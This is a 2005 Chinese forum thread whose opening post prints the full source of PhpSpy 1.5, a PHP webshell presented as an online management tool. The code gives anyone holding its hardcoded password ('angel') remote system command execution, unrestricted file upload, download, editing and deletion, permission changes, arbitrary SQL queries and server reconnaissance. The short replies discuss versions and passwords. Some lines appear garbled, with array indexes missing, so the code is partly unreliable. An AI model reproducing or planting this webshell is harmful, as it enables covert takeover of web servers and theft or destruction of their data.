大傻瓜不傻 发表于 2005 年 6 月 15 日 22:25:07

angel写的PHP在线管理工具

<?php

/*

+--------------------------------------------------------------------------+

| PhpSpy Version:1.5                   |

| Codz by Angel                      |

| (c) 2004 Security Angel Team                 |

| http://www.4ngel.net                     |

| ======================================================================== |

| Team:http://www.4ngel.net                |

|      http://www.bugkidz.org                  |

| Email: 4ngel@21cn.com                  |

| Date:July 22st(My mother's birthday), 2004             |

+--------------------------------------------------------------------------+

*/

error_reporting(7);

ob_start();

$mtime = explode(' ', microtime());

$starttime = $mtime + $mtime;



/*===================== 程序配置 =====================*/



// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效

$admin['check']="1";



// 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证

// 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证

$admin['checkmode']="1";



// 如果需要密码验证,请修改登陆密码

$admin['pass']="angel";



/*===================== 配置结束 =====================*/





// 允许程序在 register_globals = off 的环境下工作

if ( function_exists('ini_get') ) {

 $onoff = ini_get('register_globals');

} else {

 $onoff = get_cfg_var('register_globals');

}

if ($onoff != 1) {

 @extract($_POST, EXTR_SKIP);

 @extract($_GET, EXTR_SKIP);

}



/*===================== 身份验证 =====================*/

if($admin['check']=="1") {

 if($admin['checkmode']=="1") {

 /*------- session 验证 -------*/

     session_start();

     if ($_GET['action'] == "logout") {

     session_destroy();

     echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";

     echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面>>></a></span>";

     exit;

     }

     if ($_POST['action'] == "login") {

     $adminpass=trim($_POST['adminpass']);

     if ($adminpass==$admin['pass']) {

     $_SESSION['adminpass'] = $admin['pass'];

     echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";

     echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面>>></a></span>";

     exit;

     }

     }

     if (session_is_registered('adminpass')) {

     if ($_SESSION['adminpass']!=$admin['pass']) {

     loginpage();

     }

     } else {

     loginpage();

     }

 } else {

 /*------- cookie 验证 -------*/

     if ($_GET['action'] == "logout") {

     setcookie ("adminpass", "");

     echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";

     echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面>>></a></span>";

     exit;

     }

     if ($_POST['action'] == "login") {

     $adminpass=trim($_POST['adminpass']);

     if ($adminpass==$admin['pass']) {

     setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));

     echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";

     echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面>>></a></span>";

     exit;

     }

     }

     if (isset($_COOKIE['adminpass'])) {

     if ($_COOKIE['adminpass']!=$admin['pass']) {

     loginpage();

     }

     } else {

     loginpage();

     }

 }



}//end check

/*===================== 验证结束 =====================*/



// 判断 magic_quotes_gpc 状态

if (get_magic_quotes_gpc()) {

 $_GET = stripslashes_array($_GET);

 $_POST = stripslashes_array($_POST);

}



// 下载文件

if (!empty($downfile)) {

 if (!@file_exists($downfile)) {

     echo "<script>alert('你要下的文件不存在!')</script>";

 } else {

     $filename = basename($downfile);

     $filename_info = explode('.', $filename);

     $fileext = $filename_info;

     header('Content-type: application/x-'.$fileext);

     header('Content-Disposition: attachment; filename='.$filename);

     header('Content-Description: PHP3 Generated Data');

     @readfile($downfile);

     exit;

 }

}



// 程序目录(文件系统)

$pathname=str_replace('\\','/',dirname(__FILE__));



// 获取当前路径

if (!isset($dir) or empty($dir)) {

 $dir = ".";

 $nowpath = getPath($pathname, $dir);

} else {

 $dir=$_GET['dir'];

 $nowpath = getPath($pathname, $dir);

}



// 判断读写情况

if (dir_writeable($nowpath)) {

 $dir_writeable = "可写";

} else {

 $dir_writeable = "不可写";

}



$dis_func = get_cfg_var("disable_functions");

$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";

$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";

?>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>PhpSpy Ver 1.5</title>

<style type="text/css">

.maintable {

 background-color: "#FFFFFF";

 border: "1px solid #115173";

}

body,td {

 font-family: "sans-serif";

 font-size: "12px";

 line-height: "150%";

}

.INPUT {

 FONT-SIZE: "12px";

 COLOR: "#000000";

 BACKGROUND-COLOR: "#FFFFFF";

 height: "18px";

 border: "1px solid #666666";

}

a:link,

a:visited,

a:active{

 color: "#000000";

 text-decoration: underline;

}

a:hover{

 color: "#465584";

 text-decoration: none;

}

.firstalt  {BACKGROUND-COLOR: "#EFEFEF"}

.secondalt  {BACKGROUND-COLOR: "#F5F5F5"}

</style>

</head>



<body style="table-layout:fixed; word-break:break-all">

<center>

<p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p>

<?php

if ($_GET['action'] == "phpinfo") {

 $dis_func = get_cfg_var("disable_functions");

 echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";

 exit;

}

?>

<table width="760" border="0" cellpadding="0">

<form action="" method="GET">

<tr>   

   <td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>

     <br>跳转目录:

     <input name="dir" type="text" class="INPUT">

     <input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗

 </p></td>

</tr>

</form>

<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">

<tr>

 <td colspan="2">上传文件到当前目录:

   <input name="uploadmyfile" type="file" class="INPUT">  <input type="submit" class="INPUT" value="确定">

   <input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>

</tr>

</form>

<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">

<tr>

 <td colspan="2">新建文件在当前目录:

     <input name="newfile" type="text" class="INPUT" value="">

     <input type="submit" class="INPUT" value="确定">

     <input name="action" type="hidden" value="createfile"></td>

</tr>

</form>

<form action="" method="POST">

<tr>

 <td colspan="2">新建目录在当前目录:

     <input name="newdirectory" type="text" class="INPUT" value="">

     <input type="submit" class="INPUT" value="确定">

     <input name="action" type="hidden" value="createdirectory"></td>

</tr>

</form>

</table>

<hr width="760" noshade>

<?php

/*===================== 执行操作 开始 =====================*/

echo "<p><b>\n";

// 删除文件

if(@$delfile!="") {

 if(file_exists($delfile)) {

     @unlink($delfile);

     echo "".$delfile." 删除成功!";

 } else {

     echo "文件已不存在,删除失败!";

 }

}



// 删除目录

elseif($_POST['action'] == "rmdir") {

 if($deldir!="") {

     $deldirs="$dir/$deldir";

     if(!file_exists("$deldirs")) {

     echo "目录已不存在!";

     } else {

     deltree($deldirs);

     }

 } else {

     echo "删除失败!";

 }

}



// 创建目录

elseif($_POST['action'] == "createdirectory") {

 if(!empty($newdirectory)) {

     $mkdirs="$dir/$newdirectory";

     if(file_exists("$mkdirs")) {

     echo "该目录已存在!";

     } else {

     echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";

     @chmod("$mkdirs",0777);

     }

 }

}



// 上传文件

elseif($_POST['action'] == "uploadfile") {

 echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";

}



// 编辑文件

elseif($_POST['action'] == "doeditfile") {

 $filename="$dir/$editfilename";

 @$fp=fopen("$filename","w");

 echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";

 @fclose($fp);

}



// 编辑文件属性

elseif($_POST['action'] == "editfileperm") {

 $fileperm=base_convert($_POST['fileperm'],8,10);

 echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";

 echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";

}



// 连接MYSQL

elseif($connect) {

 if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {

     echo "数据库连接成功!";

 } else {

     echo mysql_error();

 }

}



// 执行SQL语句

elseif($doquery) {

 @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");

 @mysql_select_db($dbname) or die("选择数据库失败");

 $result = @mysql_query($_POST['sql_query']);

 if ($result) {

     echo "SQL语句成功执行";

 }else{

     echo "出错: ".mysql_error();

 }

 mysql_close();

}



// 查看PHP配置参数状况

elseif($_POST['action'] == "viewphpvar") {

 echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";

}



else {

 echo "本程序由 Security Angel 安全组织 angel 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本.";

}



echo "</b></p>\n";

/*===================== 执行操作 结束 =====================*/



if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<tr bgcolor="#cccccc">

 <td align="center" nowrap width="40%"><b>文件</b></td>

 <td align="center" nowrap width="20%"><b>修改日期</b></td>

 <td align="center" nowrap width="12%"><b>大小</b></td>

 <td align="center" nowrap width="8%"><b>属性</b></td>

 <td align="center" nowrap width="20%"><b>操作</b></td>

</tr>

<?php

// 目录列表

$dirs=@opendir($dir);

while ($file=@readdir($dirs)) {

 $b="$dir/$file";

 $a=@is_dir($b);

 if($a=="1"){

     if($file!=".."&&$file!=".")  {

     $lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));

     $dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);

     echo "<tr class=".getrowbg().">\n";

     echo "<td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\"><dir></td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";

     echo "</tr>\n";

     } else {

     if($file=="..") {

     echo "<tr class=".getrowbg().">\n";

     echo "<td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";

     echo "</tr>\n";

     }

     }

     $dir_i++;

 }

}//while

@closedir($dirs);



// 文件列表

$dirs=@opendir($dir);

while ($file=@readdir($dirs)) {

 $b="$dir/$file";

 $a=@is_dir($b);

 if($a=="0"){

     $size=@filesize("$dir/$file");

     $size=$size/1024 ;

     $size= @number_format($size, 3);  

     $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));

     @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);

     echo "<tr class=".getrowbg().">\n";

     echo "<td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";

     echo "<td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";

     echo "</tr>\n";

     $file_i++;

 }

}

@closedir($dirs);



echo "<tr class=".getrowbg().">\n";

echo "<td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";

echo "</tr>\n";

?>

</table>



<?php

}// end dir



elseif ($_GET['action'] == "editfile") {

 if($newfile=="") {

     $filename="$dir/$editfile";

     $fp=@fopen($filename,"r");

     $contents=@fread($fp, filesize($filename));

     @fclose($fp);

     $contents=htmlspecialchars($contents);

 }else{

     $editfile=$newfile;

     $filename = "$dir/$editfile";

 }

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<tr class="firstalt">

 <td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>

</tr>

<form action="?dir=<?=urlencode($dir)?>" method="POST">

<tr class="secondalt">

 <td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"

value="<?=$editfile?>"> 输入新文件名则建立新文件</td>

</tr>

<tr class="firstalt">

 <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>

</tr>

<tr class="secondalt">

 <td align="center"><input type="submit" value="确定写入" class="input">

   <input name="action" type="hidden" value="doeditfile">

   <input type="reset" value="重置" class="input"></td>

</tr>

</form>

</table>

<?php

}//end editfile



elseif ($_GET['action'] == "shell") {

 if (!get_cfg_var("safe_mode")) {

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<tr class="firstalt">

 <td align="center">WebShell Mode</td>

</tr>

<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">

<tr class="secondalt">

 <td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>

</tr>

<tr class="firstalt">

 <td align="center">

   选择执行函数:

   <select name="execfunc" class="input">

     <option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>

     <option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>

     <option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>

     <option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>

     <option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>

   </select> 

   输入命令:

   <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">

   <input type="submit" value="execute" class="input"></td>

</tr>

<tr class="secondalt">

 <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php

 if (!empty($_POST['command'])) {

     if ($execfunc=="system") {

     system($_POST['command']);

     } elseif ($execfunc=="passthru") {

     passthru($_POST['command']);

     } elseif ($execfunc=="exec") {

     $result = exec($_POST['command']);

     echo $result;

     } elseif ($execfunc=="shell_exec") {

     $result=shell_exec($_POST['command']);

     echo $result;  

     } elseif ($execfunc=="popen") {

     $pp = popen($_POST['command'], 'r');

     $read = fread($pp, 2096);

     echo $read;

     pclose($pp);

     } else {

     system($_POST['command']);

     }

 }

 ?></textarea></td>

</tr>

</form>

</table>

<?php

 } else {

?>

<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>

<?php

 }

}//end shell



elseif ($_GET['action'] == "deldir") {

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<form action="?dir=<?=urlencode($dir)?>" method="POST">

<tr class="firstalt">

 <td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>

</tr>

<tr class="secondalt">

 <td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>

</tr>

<tr class="firstalt">

 <td align="center">   

   <input name="action" type="hidden" value="rmdir">

   <input type="submit" value="delete" class="input">

 </td>

</tr>

</form>

</table>

<?php

}//end deldir



elseif ($_GET['action'] == "fileperm") {

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<tr class="firstalt">

 <td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>

</tr>

<form action="?dir=<?=urlencode($dir)?>" method="POST">

<tr class="secondalt">

 <td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:

   <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">

   <input name="dir" type="hidden" value="<?=urlencode($dir)?>">

   <input name="action" type="hidden" value="editfileperm">

   <input type="submit" value="modify" class="input"></td>

</tr>

</form>

</table>

<?php

}//end fileperm



elseif ($_GET['action'] == "sql") {

 $servername = isset($servername) ? $servername : '127.0.0.1';

 $dbusername = isset($dbusername) ? $dbusername : 'root';

 $dbpassword = isset($dbpassword) ? $dbpassword : '';

 $dbname = isset($dbname) ? $dbname : '';

?>

<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<tr class="firstalt">

 <td align="center">执行 SQL 语句</td>

</tr>

<form action="?action=sql" method="POST">

<tr class="secondalt">

 <td align="center">Host:

 <input name="servername" type="text" class="INPUT" value="<?=$servername?>">

 User:

 <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">

 Pass:

 <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">

 DB:

 <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">

 <input name="connect" type="submit" class="INPUT" value="连接"></td>

</tr>

<tr class="firstalt">

 <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>

</tr>

<tr class="secondalt">

 <td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>

</tr>

</form>

</table>

<?php

}//end sql query



elseif ($_GET['action'] == "phpenv") {

 $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";



 $adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";



 $dis_func = get_cfg_var("disable_functions");

 if ($dis_func == "") {

     $dis_func = "No";

 }else {

     $dis_func = str_replace(" ","<br>",$dis_func);

     $dis_func = str_replace(",","<br>",$dis_func);

 }

 

 $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";



 $info= array("服务器时间",date("Y年m月d日 h:i:s",time()));

 $info= array("服务器域名","<a href=\"http://$_SERVER\" target=\"_blank\">$_SERVER</a>");

 $info= array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));

 $info= array("服务器操作系统",PHP_OS);

 $info= array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);

 $info= array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);

 $info= array("Web服务端口",$_SERVER["SERVER_PORT"]);

 $info= array("PHP运行方式",strtoupper(php_sapi_name()));

 $info= array("PHP版本",PHP_VERSION);

 $info = array("运行于安全模式",getphpcfg("safemode"));

 $info = array("服务器管理员",$adminmail);

 $info = array("本文件路径",__FILE__);

 

 $info = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));

 $info = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));

 $info = array("显示错误信息 display_errors",getphpcfg("display_errors"));

 $info = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));

 $info = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));

 $info = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));

 $info = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));

 $info = array("允许最大上传文件 upload_max_filesize",$upsize);

 $info = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒");

 $info = array("被禁用的函数 disable_functions",$dis_func);

 $info = array("phpinfo()",$phpinfo);

 $info = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');



 $info = array("图形处理 GD Library",getfun("imageline"));

 $info = array("IMAP电子邮件系统",getfun("imap_close"));

 $info = array("MySQL数据库",getfun("mysql_close"));

 $info = array("SyBase数据库",getfun("sybase_close"));

 $info = array("Oracle数据库",getfun("ora_close"));

 $info = array("Oracle 8 数据库",getfun("OCILogOff"));

 $info = array("PREL相容语法 PCRE",getfun("preg_match"));

 $info = array("PDF文档支持",getfun("pdf_close"));

 $info = array("Postgre SQL数据库",getfun("pg_close"));

 $info = array("SNMP网络管理协议",getfun("snmpget"));

 $info = array("压缩文件支持(Zlib)",getfun("gzclose"));

 $info = array("XML解析",getfun("xml_set_object"));

 $info = array("FTP",getfun("ftp_login"));

 $info = array("ODBC数据库连接",getfun("odbc_close"));

 $info = array("Session支持",getfun("session_start"));

 $info = array("Socket支持",getfun("fsockopen"));

?>

<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

<form action="?action=phpenv" method="POST">

<tr class="firstalt">

 <td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>

</tr>

<tr class="secondalt">

 <td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>

</tr>

</form>

<?php

 for($a=0;$a<3;$a++){

     if($a == 0){

     $hp = array("server","服务器特性");

     }elseif($a == 1){

     $hp = array("php","PHP基本特性");

     }elseif($a == 2){

     $hp = array("basic","组件支持状况");

     }

?>

<tr class="firstalt">

 <td style="padding-left: 5px;"><b><?=$hp?></b></td>

</tr>

<tr class="secondalt">

 <td>

   <table width="100%" border="0" cellpadding="0" cellspacing="0">

<?

     if($a == 0){

     for($i=0;$i<=12;$i++){

     echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i]."</td><td>".$info[$i]."</td></tr>\n";

     }

     }elseif($a == 1){

     for($i=13;$i<=24;$i++){

     echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i]."</td><td>".$info[$i]."</td></tr>\n";

     }

     }elseif($a == 2){

     for($i=25;$i<=40;$i++){

     echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i]."</td><td>".$info[$i]."</td></tr>\n";

     }

     }

?>

   </table>

 </td>

</tr>

<?

 }//for

echo "</table>";

}//end phpenv

?>

<hr width="760" noshade>

<table width="760" border="0" cellpadding="0">

<tr>

 <td>Copyright (C) 2004 Security Angel Team All Rights Reserved.</td>

 <td align="right"><?php

 debuginfo();

 ob_end_flush();  

 ?></td>

</tr>

</table>

</center>

</body>

</html>



<?php



/*======================================================

函数库

======================================================*/



 // 登陆入口

 function loginpage() {

?>

     <style type="text/css">

     input {

     font-family: "Verdana";

     font-size: "11px";

     BACKGROUND-COLOR: "#FFFFFF";

     height: "18px";

     border: "1px solid #666666";

     }

     </style>

     <form method="POST" action="">

     <span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">

     <input type="submit" value="OK">

     </form>

<?php

     exit;

 }//end loginpage()



 // 页面调试信息

 function debuginfo() {

     global $starttime;

     $mtime = explode(' ', microtime());

     $totaltime = number_format(($mtime + $mtime - $starttime), 6);

     echo "Processed in $totaltime second(s)";

 }



 // 去掉转义字符

 function stripslashes_array(&$array) {

     while(list($key,$var) = each($array)) {

     if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {

     if (is_string($var)) {

         $array[$key] = stripslashes($var);

     }

     if (is_array($var)){

         $array[$key] = stripslashes_array($var);

     }

     }

     }

     return $array;

 }



 // 删除目录

 function deltree($deldir) {

     $mydir=@dir($deldir);  

     while($file=$mydir->read())  {    

     if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {

     @chmod("$deldir/$file",0777);

     deltree("$deldir/$file");

     }

     if (is_file("$deldir/$file")) {

     @chmod("$deldir/$file",0777);

     @unlink("$deldir/$file");

     }

     }

     $mydir->close();

     @chmod("$deldir",0777);

     echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";  

 }



 // 判断读写情况

 function dir_writeable($dir) {

     if (!is_dir($dir)) {

     @mkdir($dir, 0777);

     }

     if(is_dir($dir)) {

     if ($fp = @fopen("$dir/test.txt", 'w')) {

     @fclose($fp);

     @unlink("$dir/test.txt");

     $writeable = 1;

     } else {

     $writeable = 0;

     }

     }

     return $writeable;

 }



 // 表格行间的背景色替换

 function getrowbg() {

     global $bgcounter;

     if ($bgcounter++%2==0) {

     return "firstalt";

     } else {

     return "secondalt";

     }

 }



 // 获取当前的文件系统路径

 function getPath($mainpath, $relativepath) {

     global $dir;

     $mainpath_info       = explode('/', $mainpath);

     $relativepath_info   = explode('/', $relativepath);

     $relativepath_info_count = count($relativepath_info);

     for ($i=0; $i<$relativepath_info_count; $i++) {

     if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;

     if ($relativepath_info[$i] == '..') {

     $mainpath_info_count = count($mainpath_info);

     unset($mainpath_info[$mainpath_info_count-1]);

     continue;

     }

     $mainpath_info = $relativepath_info[$i];

     } //end for

     return implode('/', $mainpath_info);

 }



 // 检查PHP配置参数

 function getphpcfg($varname) {

     switch($result = get_cfg_var($varname)) {

     case 0:

     return No;

     break;

     case 1:

     return Yes;

     break;

     default:

     return $result;

     break;

     }

 }



 // 检查函数情况

 function getfun($funName) {

     return (false !== function_exists($funName)) ? Yes : No;

 }

?>

笑傲中国 发表于 2005 年 6 月 15 日 23:29:19

1.5,是不是很老的版本

大傻瓜不傻 发表于 2005 年 6 月 15 日 23:43:09

找不到最新的呀
安全天使那里也找不到

大傻瓜不傻 发表于 2005 年 6 月 15 日 23:44:08

http://www.4ngel.net/project/phpspy.htm

最新的是这个了
大家可以自己去下载

热血NE 发表于 2005 年 6 月 16 日 09:15:33

没演示呀??

大傻瓜不傻 发表于 2005 年 6 月 16 日 15:50:31

谁会把这个上自己空间去给演示的呀
随便可以下载自己的程序和删除的~!!!~
就算上了也不能给别人知道呀

xinews 发表于 2005 年 6 月 17 日 22:19:49

最新版的要密码
密码是多少?

vaman 发表于 2005 年 6 月 17 日 22:50:52

是不是就是探针啊

vaman 发表于 2005 年 6 月 17 日 22:55:36

Password:

吻痕 发表于 2005 年 6 月 17 日 23:13:26

类似webftp吗?
页: [1]
查看完整版本: angel写的PHP在线管理工具